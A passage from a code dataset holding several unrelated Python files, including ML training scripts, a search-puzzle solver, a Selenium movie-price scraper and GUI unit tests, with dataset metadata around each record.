result.append(-heapq.heappop(left))\n while right:\n result.append(heapq.heappop(right))\n result = set(result)\n answer = [\"O\" if i in result else \"X\" for i in range(n)]\n\n return \"\".join(answer)\n","sub_path":"Kakao/표 편집.py","file_name":"표 편집.py","file_ext":"py","file_size_in_byte":2105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"434835336","text":"#!/usr/bin/python\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl # https://stackoverflow.com/questions/23309272/matplotlib-log-transform-counts-in-hist2d\nimport sys\nimport random as rd\n\n\nr_ROI = float(sys.argv[1])\nD0 = float(sys.argv[2])\nD1 = float(sys.argv[3])\ndphi = float(sys.argv[4]) * np.pi / 180.\n\nN_ROI = int(sys.argv[5])\nN_arc = int(sys.argv[6])\n\np_ROI_x = np.zeros(N_ROI)\np_ROI_y = np.zeros(N_ROI)\np_arc_x = np.zeros(N_arc)\np_arc_y = np.zeros(N_arc)\n\n\nfor i in range(0, N_ROI):\n\tr = rd.uniform(0., r_ROI)\n\tphi = rd.uniform(0., 2.*np.pi)\n\n\tp_ROI_x[i] = r * np.cos(phi)\n\tp_ROI_y[i] = r * np.sin(phi)\n\n\nfor i in range(0, N_arc):\n\tr = rd.uniform(D0, D1)\n\tphi = rd.uniform(0., dphi)\n\n\tp_arc_x[i] = r * np.cos(phi)\n\tp_arc_y[i] = r * np.sin(phi)\n\n# compute all mutual distances\n\nd_array = np.zeros(N_ROI * N_arc)\nang_array = np.zeros(N_ROI * N_arc)\n\nfor i in range(0, N_ROI):\n\t\n\tfor j in range(0, N_arc):\n\t\tx = p_ROI_x[i] - p_arc_x[j]\n\t\ty = p_ROI_y[i] - p_arc_y[j]\n\n\t\tidx = j + i*N_arc\n\n\t\td = np.sqrt( x**2 + y**2 )\n\t\td_array[idx] = d\n\n\t\tang = np.abs((np.mod(np.arctan2(y, x) + 2*np.pi, 2*np.pi) - dphi/2.)*180./np.pi - 180.)\n\t\tang_array[idx] = ang\n\n\t\t#print(d, np.mod(ang + 2.*np.pi, 2*np.pi))\n\n#ang_array = ang_array*180./np.pi - 180.\n\nx_bins = np.linspace(np.min(d_array), np.max(d_array), 50) \ny_bins = np.linspace(np.min(ang_array), np.max(ang_array), 50)\n\nplt.hist2d(d_array, ang_array, bins =[x_bins, y_bins], norm=mpl.colors.LogNorm())\nplt.figure()\nplt.hist(d_array)\nplt.figure()\nplt.hist(ang_array)\nplt.show()","sub_path":"LunarEjectaCode/distance_distribution_test.py","file_name":"distance_distribution_test.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"364381886","text":"\"\"\"\nUse this code as a guide for extracting a dataset of CQFT features.\n\"\"\"\nimport bregman\nfrom scipy import io\nimport numpy as np\n\nclass Batch():\n def __init__(self, data_dir=None):\n self.data_dir = data_dir\n if self.data_dir is None:\n self.data_dir = '/global/data/casey/sarroff/projects/hamr/data'\n\n def cqft(self, runid, ncores, debug=False):\n allsongs = np.load(self.data_dir+'/filt_allsongs.npy').item()\n l = len(allsongs)\n if debug:\n l = ncores * 3\n v = allsongs.values()\n alt_dir = '/global/data/casey/sarroff/projects/groove/data'\n for i in range(runid, l, ncores):\n wav_f = alt_dir+'/audio/wav/'+str(v[i].id)+'.wav'\n # read wav file\n #beats = v[i].beat4.T[0]\n print(\"\\t{0}\\t{1}\".format(float(i)/l, wav_f))\n x = bregman.sound.WavOpen(wav_f, 6*22050).sig[22050:]\n p = bregman.features.Features().default_feature_params()\n p['hi'] = 10000\n p['nfft'] = 2048\n p['nhop'] = 1024\n p['sample_rate'] = 22050\n p['wfft'] = 2048\n F = bregman.features.Features(x, p)\n data_file = ('/scratch/sarroff/{0}/'.format(runid)+\n v[i].id+'.cqft.npz')\n np.savez(data_file, CQFT=F.CQFT, POWER=F.POWER, Q=F.Q,\n STFT=F.STFT, feature_params=F.feature_params)\n\ndef collect(data_base='../data'):\n allkeys = np.load(data_base+'/allkeys.npy')\n tmp = np.load(data_base+'/cqft/'+allkeys[0]+'.cqft.npz')['CQFT'].shape\n allcqft = np.empty((len(allkeys), tmp[0]*tmp[1]))\n for i,k in enumerate(allkeys):\n print(float(i)/len(allkeys))\n allcqft[i] = np.load(data_base+'/cqft/'+allkeys[i]+'.cqft.npz'\n )['CQFT'].flatten()\n return allcqft\n\nif __name__ == \"__main__\":\n \"\"\"\n Main function for batch extracting features.\n \"\"\"\n import sys\n B = Batch()\n if sys.argv[1] == \"cqft\":\n runid = int(sys.argv[2])\n ncores = int(sys.argv[3])\n print(\"Extracting cqft... runid={0}, ncores={1}\".format(\n runid, ncores))\n if len(sys.argv) == 5 and sys.argv[4] == \"True\":\n print(\"Debug on\")\n debug = True\n else:\n debug = False\n B.cqft(runid, ncores, debug)\n","sub_path":"deepAEFeatures.py","file_name":"deepAEFeatures.py","file_ext":"py","file_size_in_byte":2348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"286503892","text":"import tensorflow as tf\nimport tfcoreml as tf_converter\nfrom coremltools.proto import NeuralNetwork_pb2\n\ntf.app.flags.DEFINE_string(\n 'input_pb_file',\n '/home/corp.owlii.com/yi.xu/workspace/sgmt/train/deploy/deploy_graph.pb',\n 'Input tensorflow pb file')\n\ntf.app.flags.DEFINE_string(\n 'output_mlmodel',\n '/home/corp.owlii.com/yi.xu/workspace/sgmt/train/deploy/deploy_graph.mlmodel',\n 'Output coreml model file')\n\ntf.app.flags.DEFINE_integer(\n 'stage', 1, 'stage of model to be transformed')\n\nFLAGS = tf.app.flags.FLAGS\n\nif FLAGS.stage == 1:\n input_sizes = [[1, 600, 600, 3]]\n input_node_names = ['resize_images/ResizeBilinear:0']\n output_node_names = ['concat:0', 'Softmax:0', 'FirstStageFeatureExtractor/MobilenetV2/expanded_conv_16/output:0']\nelif FLAGS.stage == 2:\n input_sizes = [[1, 14, 14, 320]]\n input_node_names = ['CropAndResize:0']\n output_node_names = ['class_scores:0', 'refined_box_encodings:0']\n\ndef main(unused_argv):\n if FLAGS.stage == 1:\n tf_converter.convert(tf_model_path = FLAGS.input_pb_file,\n mlmodel_path = FLAGS.output_mlmodel,\n image_input_names = input_node_names[0],\n output_feature_names = output_node_names,\n input_name_shape_dict = {input_node_name: input_size \n for input_node_name, input_size in zip(input_node_names, input_sizes)})\n else:\n tf_converter.convert(tf_model_path = FLAGS.input_pb_file,\n mlmodel_path = FLAGS.output_mlmodel,\n output_feature_names = output_node_names,\n input_name_shape_dict = {input_node_name: input_size \n for input_node_name, input_size in zip(input_node_names, input_sizes)})\n\n\nif __name__ == '__main__':\n tf.app.run()\n\n\n","sub_path":"workspace/det/tf_coreml_utils/frcnn_tf2coreml_zcr/tf-coreml/tf2coreml.py","file_name":"tf2coreml.py","file_ext":"py","file_size_in_byte":1896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"548598174","text":"################\r\n\r\n\r\n#Prithvi Shetty\r\n#Written in Python 3.6\r\n\r\n\r\nclass Problem:\r\n\r\n #To limit infinite negative possibilities\r\n def negative(self):\r\n return(self<0)\r\n \r\n #To limit infinite positive possibilities\r\n def positive(self):\r\n return(self>3)\r\n \r\n #To create all the possible tree branches\r\n def branch(self):\r\n np=[]\r\n \r\n \r\n #All the possible actionable outcomes\r\n #1st number in the tuple indicates number of cannibals on the left bank\r\n #2nd number in the tuple indicates number of missionaries on the right bank\r\n #3rd number in the tuple indicates position of boat\r\n #1 indicates left bank and 2 indicates right bank\r\n \r\n state1=(1, 0, 1)\r\n state2=(2, 0, 1)\r\n state3=(0, 1, 1)\r\n state4=(0, 2, 1)\r\n state5=(1, 1, 1)\r\n\r\n for i in (state1,state2,state3,state4,state5):\r\n #If position of boat is left bank, this lists out all the possible outcomes\r\n if self[2]==1:\r\n branch = [a - b for a, b in zip(self, i)] #Subtracts the current state with the possible state\r\n branch = tuple(branch)\r\n if any(Problem.negative(x) for x in branch): #Checks the negative limit\r\n continue\r\n\r\n else:\r\n np.append(branch)\r\n #If position of boat is right bank, this lists out of all the possible outcomes\r\n else:\r\n branch = [a + b for a, b in zip(self, i)] #Adds the current state with the possible state\r\n branch = tuple(branch)\r\n if any(Problem.positive(x) for x in branch): #Checks the positive limit\r\n continue\r\n\r\n else: \r\n np.append(branch)\r\n\r\n\r\n return np\r\n \r\n #This function checks if the state is dead (i.e. when the number of cannibals exceeds the number of missionaries)\r\n def dead(self):\r\n return (self[1]>self[0] and self[0]!=0) or (3-self[0]< 3-self[1] and 3-self[0]!=0)\r\n \r\n #This function checks if the state has reached the goal state which is (0,0,0)\r\n def goal(self):\r\n return(self==(0, 0, 0))\r\n\r\n \r\n #This function searches the tree with Blind Depth for search\r\n def blind_dfs(self,queue,dictionary):\r\n\r\n #Checks if goal state is reached, it prints out the path and appends to a dictionary under 'all states'\r\n if Problem.goal(self):\r\n queue.append(self)\r\n print (\"Solution:\")\r\n for q in queue:\r\n print (q)\r\n \r\n dictionary['all_states'] += 1\r\n queue.pop()\r\n \r\n #Checks if state is dead and appends to a dictionary under dead states\r\n #Also appends under ' all states'\r\n elif Problem.dead(self):\r\n dictionary['dead_states'] +=1\r\n dictionary['all_states'] += 1\r\n\r\n #Checks if state is repeated again and appends to a dictionary under repeated states\r\n elif (self in queue):\r\n dictionary['repeated_states']+=1\r\n dictionary['all_states'] += 1\r\n \r\n #If valid, then further search deepens\r\n \r\n else :\r\n queue.append(self)\r\n dictionary['all_states']+=1\r\n next = Problem.branch(self)\r\n for i in next:\r\n Problem.blind_dfs(i,queue,dictionary)\r\n \r\n queue.pop()\r\n\r\n\r\n def run(self):\r\n \r\n #Initialize an empty dictionary to maintain a count of the three states (all states, dead states and repeated states)\r\n dictionary = {}\r\n (dictionary['dead_states'], dictionary['all_states'], dictionary['repeated_states']) = (0,0,0)\r\n \r\n #Queue to track the path\r\n queue = []\r\n \r\n #Initializer\r\n Problem.blind_dfs((3,3,1),queue,dictionary)\r\n print (\"totals\", dictionary['all_states'] - dictionary['dead_states'] - dictionary['repeated_states'], end=' ')\r\n print (\"illegals\", dictionary['dead_states'], end= ' ')\r\n print(\"repeats\", dictionary['repeated_states'], end= ' ')\r\n \r\n#Implementation\r\na=Problem()\r\na.run()\r\n\r\n\r\n####################\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"651711205","text":"#!/usr/bin/env python3\n\n\ndef files1():\n fhand = open('mbox-short.txt')\n\n \"\"\"\n count = 0\n for line in fhand:\n count = count + 1\n\n print('Line Count:', count)\n \"\"\"\n\n inp = fhand.read()\n print(len(inp))\n print(inp[:20])\n\n\ndef files2():\n fhand = open('mbox-short.txt')\n for line in fhand:\n line = line.rstrip()\n if line.startswith('From:') :\n print(line)\n\n\ndef files3():\n fhand = open('mbox-short.txt')\n for line in fhand:\n line = line.rstrip()\n if line.find('@uct.ac.za') == -1 :\n continue\n print(line)\n\ndef files4():\n fname = input('Enter the file name: ')\n try:\n fhand = open(fname)\n except:\n print('File cannot be opened:', fname)\n exit()\n\n count = 0\n for line in fhand:\n if line.startswith('Subject:') :\n count = count + 1\n\n print('There were', count, 'subject lines in', fname)\n\n\ndef files5():\n fout = open('output.txt', 'w')\n line1 = \"This here's the wattle,\\n\"\n fout.write(line1)\n fout.close()\n\n\nif __name__ == '__main__':\n #files1()\n #files2()\n #files3()\n #files4()\n files5()\n","sub_path":"chapter7.py","file_name":"chapter7.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"596166708","text":"from __future__ import absolute_import\r\nfrom __future__ import division\r\nfrom __future__ import print_function\r\nimport argparse\r\nimport sys\r\nimport math\r\nimport numpy as np\r\nfrom tensorflow.examples.tutorials.mnist import input_data\r\nimport tensorflow as tf\r\nFLAGS = None\r\n \r\ndef train():\r\n\tf = open('acc.txt', 'w')\r\n\t# Import data\r\n\tmnist = input_data.read_data_sets(FLAGS.data_dir,one_hot=True,fake_data=FLAGS.FakeData)\r\n\tsess = tf.InteractiveSession()\r\n\tdef weight_variable(shape):\r\n\t\tinitial = tf.truncated_normal(shape, stddev=0.1)\r\n\t\treturn tf.Variable(initial)\r\n\r\n\tdef bias_variable(shape):\r\n\t\tinitial = tf.constant(0.1, shape=shape)\r\n\t\treturn tf.Variable(initial)\r\n\t\t\t\r\n\tdef conv2d(x, W, strides=[1, 1, 1, 1]):\r\n\t\treturn tf.nn.conv2d(x, W, strides, padding='SAME')\r\n\r\n\tdef max_pool_2x2(x):\r\n\t\treturn tf.nn.max_pool(x, ksize=[1, 2, 2, 1],strides=[1, 2, 2, 1], padding='SAME')\r\n\r\n\tdef feed_dict(train,LR):\r\n\t\tif train or FLAGS.FakeData:\r\n\t\t\txs, ys = mnist.train.next_batch(100, fake_data=FLAGS.FakeData)\r\n\t\t\tk = FLAGS.dropout\r\n\t\telse:\r\n\t\t\txs, ys = mnist.test.images, mnist.test.labels\r\n\t\t\tk = 1.0\r\n\t\treturn {x: xs, y_: ys, keep_prob: k, lr: LR}\r\n\t\r\n\t# Input placeholders\r\n\tx = tf.placeholder(tf.float32, shape=[None, 784])\r\n\ty_ = tf.placeholder(tf.float32, shape=[None, 10])\r\n\tlr = tf.placeholder(tf.float32)\r\n\tW = tf.Variable(tf.zeros([784,10]))\r\n\tb = tf.Variable(tf.zeros([10]))\r\n\tsess.run(tf.initialize_all_variables())\r\n\ty = tf.nn.softmax(tf.matmul(x,W) + b)\r\n\tx_image = tf.reshape(x, [-1,28,28,1])\r\n\tkeep_prob = tf.placeholder(tf.float32)\r\n\t\r\n\t# First convolutional layer - maps one grayscale image to 32 feature maps.\r\n\tW1 = tf.Variable(tf.truncated_normal([6, 6, 1, 6], stddev=0.1))\r\n\tB1 = tf.Variable(tf.constant(0.1, tf.float32, [6]))\r\n\t\r\n\tW2 = tf.Variable(tf.truncated_normal([6, 6, 6, 12], stddev=0.1))\r\n\tB2 = tf.Variable(tf.constant(0.1, tf.float32, [12]))\r\n\t\r\n\tW3 = tf.Variable(tf.truncated_normal([4, 4, 12, 24], stddev=0.1))\r\n\tB3 = tf.Variable(tf.constant(0.1, tf.float32, [24]))\r\n\r\n\tW4 = tf.Variable(tf.truncated_normal([7 * 7 * 24, 200], stddev=0.1))\r\n\tB4 = tf.Variable(tf.constant(0.1, tf.float32, [200]))\r\n\t\r\n\tW5 = tf.Variable(tf.truncated_normal([200, 10], stddev=0.1))\r\n\tB5 = tf.Variable(tf.constant(0.1, tf.float32, [10]))\r\n\t\r\n\t#stride = 1 # output is 28x28\r\n\tY1 = tf.nn.relu(tf.nn.conv2d(x_image, W1, strides=[1, 1, 1, 1], padding='SAME') + B1)\r\n\t#stride = 2 # output is 14x14\r\n\tY2 = tf.nn.relu(tf.nn.conv2d(Y1, W2, strides=[1, 2, 2, 1], padding='SAME') + B2)\r\n\t#stride = 2 # output is 7x7\r\n\tY3 = tf.nn.relu(tf.nn.conv2d(Y2, W3, strides=[1, 2, 2, 1], padding='SAME') + B3)\r\n\tYY = tf.reshape(Y3, shape=[-1, 7 * 7 * 24])\r\n\t\r\n\tY4 = tf.nn.relu(tf.matmul(YY, W4) + B4)\r\n\tYY4 = tf.nn.dropout(Y4, keep_prob)\r\n\tYlogits = tf.matmul(YY4, W5) + B5\r\n\ty_conv = tf.nn.softmax(Ylogits)\r\n\t\r\n\tcross_entropy = tf.nn.softmax_cross_entropy_with_logits(logits=Ylogits, labels=y_)\r\n\tcross_entropy = tf.reduce_mean(cross_entropy)*100\r\n\ttrain_step = tf.train.AdamOptimizer(lr).minimize(cross_entropy)\r\n\tcorrect_prediction = tf.equal(tf.argmax(y_conv,1), tf.argmax(y_,1))\r\n\taccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\r\n\ttf.summary.scalar('cross entropy', cross_entropy)\r\n\ttf.summary.scalar('accuracy', accuracy)\r\n\t\r\n\r\n # Merge all the summaries and write them out to\r\n # /tmp/tensorflow/mnist/logs/mnist_with_summaries (by default)\r\n\tmerged = tf.summary.merge_all()\r\n\ttrain_writer = tf.summary.FileWriter(FLAGS.log_dir + '/train', sess.graph)\r\n\ttest_writer = tf.summary.FileWriter(FLAGS.log_dir + '/test')\r\n\ttf.global_variables_initializer().run()\r\n\ttr_acc_list = []\r\n\ttrain_d = np.zeros((784))\r\n\ttest_d = np.zeros((10))\r\n\tfor i in range(FLAGS.max_step):\r\n\t\tmax_learning_rate = 0.003\r\n\t\tmin_learning_rate = 0.0001\r\n\t\tdecay_speed = 2000.0\r\n\t\tlearning_rate = min_learning_rate + (max_learning_rate - min_learning_rate) * math.exp(-i/decay_speed)\r\n\t\t\r\n\t\tif i % 100 == 0:\r\n\t\t\tsummary, acc = sess.run([merged, accuracy], feed_dict=feed_dict(False,learning_rate))\r\n\t\t\ttest_writer.add_summary(summary, i)\r\n\t\t\tif i != 0:\r\n\t\t\t\ts,tr_acc = sess.run([merged,accuracy],feed_dict={x:train_d[1:,],y_:test_d[1:,],keep_prob: 1.0})\r\n\t\t\t\tf.write('Step: %s Train Accuracy: %s Test Accuracy: %s\\n' % (i, tr_acc, acc))\r\n\t\t\t\tprint('Step: %s Train Accuracy: %s Test Accuracy: %s' % (i, tr_acc, acc))\r\n\t\t\t\ttr_acc_list.append(acc)\r\n\t\t\telse:\r\n\t\t\t\tf.write('Step: %s Test Accuracy: %s\\n' % (i, acc))\r\n\t\t\t\tprint('Step: %s Test Accuracy: %s' % (i, acc))\r\n\t\t\ttrain_d = np.zeros((784))\r\n\t\t\ttest_d = np.zeros((10))\r\n\t\telse: \r\n\t\t\tfd_train = feed_dict(True,learning_rate)\r\n\t\t\tsummary, _ = sess.run([merged, train_step], feed_dict=fd_train)\r\n\t\t\ttrain_writer.add_summary(summary, i)\r\n\t\t\ttrain_d = np.vstack((train_d,list(fd_train.values())[0]))\r\n\t\t\ttest_d = np.vstack((test_d,list(fd_train.values())[1]))\r\n\tf.write('\\n Average test accuracy: %s' % (np.mean(tr_acc_list)))\r\n\tf.write('\\n Max test accuracy: %s' % (np.amax(tr_acc_list)))\r\n\tf.close()\r\n\r\ndef main(_):\r\n\tif tf.gfile.Exists(FLAGS.log_dir):\r\n\t\ttf.gfile.DeleteRecursively(FLAGS.log_dir)\r\n\ttf.gfile.MakeDirs(FLAGS.log_dir)\r\n\ttrain()\r\n \r\nif __name__ == '__main__':\r\n\tflags = tf.app.flags\r\n\tFLAGS = flags.FLAGS\r\n\tflags.DEFINE_boolean('FakeData', False, 'If true, uses fake data for unit testing.')\r\n\tflags.DEFINE_integer('max_step', 100001, 'Number of steps to run trainer.')\r\n\tflags.DEFINE_float('lr', 0.0001, 'Initial learning rate.')\r\n\tflags.DEFINE_float('dropout', 0.75, 'Keep probability for training dropout.')\r\n\tflags.DEFINE_string('data_dir', '/home/huaminz2/cs498/hw8/mnist/advanced/input_data', 'Directory for storing data')\r\n\tflags.DEFINE_string('log_dir', '/home/huaminz2/cs498/hw8/mnist/advanced/mnist_with_summaries', 'Summaries log directory')\r\n\t#parser.add_argument('--fake_data', nargs='?', const=True, type=bool,default=False,help='If true, uses fake data for unit testing.')\r\n\t#parser.add_argument('--max_steps', type=int, default=1000,help='Number of steps to run trainer.')\r\n\t#parser.add_argument('--learning_rate', type=float, default=0.001,help='Initial learning rate')\r\n\t#parser.add_argument('--dropout',type=float, default=0.9,help='Keep probability for training dropout.')\r\n\t#parser.add_argument('--data_dir',type=str,default='/tmp/tensorflow/mnist/input_data',help='Directory for storing input data')\r\n\t#parser.add_argument('--log_dir',type=str,default='/tmp/tensorflow/mnist/logs/mnist_with_summaries',help='Summaries log directory')\r\n\t#FLAGS, unparsed = parser.parse_known_args()\r\n\ttf.app.run()\r\n\t\t\t\r\n\t\r\n \r\n","sub_path":"CNN_MNIST&CIFAR(Tensorflow)/result&script/mnist/advanced/HW8_mnist3.py","file_name":"HW8_mnist3.py","file_ext":"py","file_size_in_byte":6487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"224957223","text":"import unittest\n\nfrom PyQt5.QtCore import QPoint\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtTest import QTest\n\nimport tests.utils_testing\nfrom urh import constants\nfrom urh.controller.MainController import MainController\n\nfrom tests.utils_testing import get_path_for_data_file\n\napp = tests.utils_testing.app\n\n\nclass TestAnalysisTabGUI(unittest.TestCase):\n def setUp(self):\n constants.SETTINGS.setValue(\"not_show_close_dialog\", True) # prevent interactive close questions\n self.form = MainController()\n self.cfc = self.form.compare_frame_controller\n self.form.add_signalfile(get_path_for_data_file(\"two_participants.complex\"))\n self.signal = self.form.signal_tab_controller.signal_frames[0].signal\n self.signal.noise_threshold = 0.0175\n self.signal.qad_center = 0\n self.signal.bit_len = 100\n self.signal.tolerance = 5\n\n def test_analyze_button_fsk(self):\n self.form.add_signalfile(get_path_for_data_file(\"fsk.complex\"))\n self.cfc.ui.btnAnalyze.click()\n self.assertTrue(True)\n\n def test_analyze_button_enocean(self):\n self.form.add_signalfile(get_path_for_data_file(\"enocean.complex\"))\n w = self.form.signal_tab_controller.signal_frames[1].ui.spinBoxCenterOffset\n w.setValue(0)\n QTest.keyClick(w, Qt.Key_Enter)\n w = self.form.signal_tab_controller.signal_frames[1].ui.spinBoxNoiseTreshold\n w.setValue(0.0111)\n QTest.keyClick(w, Qt.Key_Enter)\n self.cfc.ui.btnAnalyze.click()\n self.assertTrue(True)\n\n def test_table_selection(self):\n self.form.ui.tabWidget.setCurrentIndex(1)\n self.cfc.ui.cbProtoView.setCurrentIndex(0)\n self.cfc.ui.btnAnalyze.click()\n\n self.cfc.ui.tblViewProtocol.selectRow(1)\n app.processEvents()\n self.assertEqual(self.cfc.ui.lBitsSelection.text(), self.cfc.proto_analyzer.messages[1].plain_bits_str)\n\n self.cfc.ui.tblViewProtocol.clearSelection()\n app.processEvents()\n self.assertEqual(\"\", self.cfc.ui.lBitsSelection.text())\n\n self.cfc.ui.tblViewProtocol.select(0, 0, 0, 3)\n app.processEvents()\n self.assertEqual(\"1010\", self.cfc.ui.lBitsSelection.text())\n self.cfc.ui.cbProtoView.setCurrentIndex(1)\n min_row, max_row, start, end = self.cfc.ui.tblViewProtocol.selection_range()\n self.assertEqual(min_row, 0)\n self.assertEqual(max_row, 0)\n self.assertEqual(start, 0)\n self.assertEqual(end, 1)\n\n def test_search(self):\n search_str = \"100110001\"\n self.cfc.ui.cbProtoView.setCurrentIndex(0)\n self.cfc.ui.tblViewProtocol.clearSelection()\n self.cfc.ui.lineEditSearch.setText(search_str)\n self.cfc.ui.btnSearchSelectFilter.click()\n\n selected_now = self.cfc.ui.tblViewProtocol.selectedIndexes()\n self.assertEqual(len(self.cfc.ui.tblViewProtocol.selectedIndexes()), len(search_str))\n\n self.cfc.ui.btnNextSearch.click()\n self.assertNotEqual(selected_now, self.cfc.ui.tblViewProtocol.selectedIndexes())\n\n self.cfc.ui.btnPrevSearch.click()\n self.assertEqual(selected_now, self.cfc.ui.tblViewProtocol.selectedIndexes())\n\n self.cfc.select_action.trigger()\n self.assertEqual(self.cfc.ui.btnSearchSelectFilter.text(), \"Select all\")\n self.cfc.ui.btnSearchSelectFilter.click()\n self.assertGreater(len(self.cfc.ui.tblViewProtocol.selectedIndexes()), len(selected_now))\n\n self.cfc.filter_action.trigger()\n self.assertEqual(self.cfc.ui.btnSearchSelectFilter.text(), \"Filter\")\n self.cfc.ui.btnSearchSelectFilter.click()\n hidden_rows = [i for i in range(self.cfc.protocol_model.row_count)\n if self.cfc.ui.tblViewProtocol.isRowHidden(i)]\n\n self.assertEqual(hidden_rows, [0, 5, 6, 10, 13, 14, 16, 17])\n\n def test_show_diff(self):\n hidden_columns_before = [i for i in range(self.cfc.protocol_model.col_count)\n if self.cfc.ui.tblViewProtocol.isColumnHidden(i)]\n self.assertEqual(len(hidden_columns_before), 0)\n\n self.cfc.ui.chkBoxShowOnlyDiffs.click()\n self.assertTrue(self.cfc.ui.cbShowDiffs.isChecked())\n\n hidden_columns_now = [i for i in range(self.cfc.protocol_model.col_count)\n if self.cfc.ui.tblViewProtocol.isColumnHidden(i)]\n\n self.assertNotEqual(hidden_columns_before, hidden_columns_now)\n\n self.cfc.ui.chkBoxOnlyShowLabelsInProtocol.click()\n\n hidden_columns_now = [i for i in range(self.cfc.protocol_model.col_count)\n if self.cfc.ui.tblViewProtocol.isColumnHidden(i)]\n\n self.assertEqual(len(hidden_columns_now), self.cfc.protocol_model.col_count)\n\n def test_add_message_type(self):\n self.assertEqual(len(self.cfc.proto_analyzer.message_types), 1)\n self.cfc.ui.btnAddMessagetype.click()\n self.assertEqual(len(self.cfc.proto_analyzer.message_types), 2)\n\n def test_create_context_menu(self):\n # Add protocol label should be disabled if table is empty\n self.form.close_all()\n self.assertEqual(self.cfc.protocol_model.rowCount(), 0)\n self.cfc.ui.tblViewProtocol.context_menu_pos = QPoint(0, 0)\n menu = self.cfc.ui.tblViewProtocol.create_context_menu()\n\n create_label_action = next(a for a in menu.actions() if a.text() == \"Add protocol label\")\n self.assertFalse(create_label_action.isEnabled())\n","sub_path":"tests/test_analysis_tab_GUI.py","file_name":"test_analysis_tab_GUI.py","file_ext":"py","file_size_in_byte":5471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"412433224","text":"import sys\nimport io\n\nsys.stdout = io.TextIOWrapper(sys.stdout.detach(), encoding = 'utf-8')\nsys.stderr = io.TextIOWrapper(sys.stderr.detach(), encoding = 'utf-8')\n\n\n\"\"\"\n\n\"\"\"\n\nfrom selenium import webdriver\n\noptions = webdriver.ChromeOptions()\noptions.headless = True\noptions.add_argument(\"window-siez=1920x1080\")\n\nbrowser = webdriver.Chrome(options=options)\n# browser.maximize_window()\n\n# 페이지 이동\nurl = \"https://play.google.com/store/movies/top\"\nbrowser.get(url)\n\n# 지정한 위치로 스크롤 내리기\n#browser.execute_script(\"window.scrollTo(0,1080)\") # 윈도우에서 세로 방향으로 1080(본인 컴퓨터 해상도)위치로 내려라..\n# browser.execute_script(\"window.scrollTo(0,2080)\")\n\n# 화면 가장 아래로 스크롤 내리기\n\n# browser.execute_script(\"window.scrollTo(0,document.body.scrollHeight)\")\n\nimport time\ninterval = 5\n\nprev_height = browser.execute_script(\"return document.body.scrollHeight\")\n\nwhile True:\n # 스크롤을 가장 먼저 아래로\n browser.execute_script(\"window.scrollTo(0,document.body.scrollHeight)\")\n time.sleep(interval)\n current_height = browser.execute_script(\"return document.body.scrollHeight\")\n if current_height == prev_height:\n break\n\n prev_height = current_height\nprint(\"scroll 완료\")\nbrowser.get_screenshot_as_file(\"google_movie.png\")\n\n\n# 스크래핑 작업 실시\n# 원래는 import 구문은 위에 있는 것이 문법에 맞다.\n\nimport requests\nfrom bs4 import BeautifulSoup\n\nsoup = BeautifulSoup(browser.page_source,\"lxml\")\n\n# movies = soup.find_all(\"div\",attrs={\"class\":[\"ImZGtf mpg5gc\", \"Vpfmgd\"]}) # 클래스 2개로 찾기\nmovies = soup.find_all(\"div\",attrs={\"class\":\"Vpfmgd\"})\n\n# print(len(movies))\n\n# WsMG1c nnK0zc 영화들의 class\n# SUZt4c djCuy 할인가격이 있는 영화는 해당 class를 갖는다.\n# VfPpfd ZdBevf i5DZme 할인가격 클래스\n# JC71ub는 영화 link\nfor movie in movies:\n title = movie.find(\"div\",attrs={\"class\":\"WsMG1c nnK0zc\"}).get_text()\n # print(title)\n original_price = movie.find(\"span\",attrs={\"class\":\"SUZt4c djCuy\"})\n if original_price:\n original_price = original_price.get_text()\n else:\n # print(title,\"할인되지 않은 영화 제외\")\n continue\n\n # 할인된 가격\n price = movie.find(\"span\",attrs={\"class\":\"VfPpfd ZdBevf i5DZme\"}).get_text()\n\n # 링크\n link = movie.find(\"a\",attrs={\"class\":\"JC71ub\"})[\"href\"]\n print(f\"제목 : {title}\")\n print(f\"할인 전 금액 : {original_price}\")\n print(f\"할인 후 금액 : {price}\")\n print(\"링크 : \", \"https://play.google.com\"+link)\n print(\"-\"*120)\n\nbrowser.quit()\n\n# 웹 스크래핑 4:15:23초 완료.\n","sub_path":"webscraping_basic/17_headless_chrome.py","file_name":"17_headless_chrome.py","file_ext":"py","file_size_in_byte":2667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"16470209","text":"import logging\nfrom django.conf import settings\nfrom django.core.exceptions import ImproperlyConfigured\n\nlogger = logging.getLogger(__name__)\n\n\nclass NullHandler(logging.Handler):\n def emit(self, record):\n pass\nnullhandler = logger.addHandler(NullHandler())\n\n\nclass Base(object):\n\n def __init__(self, using=None):\n self._using = None\n self._set_using(using)\n\n def _set_using(self, value=None):\n \"\"\"Sets the using parameter for this machine, almost always a server.\n\n Args:\n value: valid settings DATABASE key. (default: default)\n\n \"\"\"\n if not value:\n value = 'default'\n self._using = value\n self.verify_using(value)\n\n def get_using(self):\n if not self._using:\n self._set_using()\n return self._using\n\n def verify_using(self, value):\n if value not in settings.DATABASES.keys():\n raise ImproperlyConfigured('Cannot find key \"{0}\" in settings.DATABASES.'.format(value))\n return True\n","sub_path":"edc/device/sync/classes/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"398705948","text":"import os\nimport subprocess\n\n\ndef create_repo(name):\n repo_path = 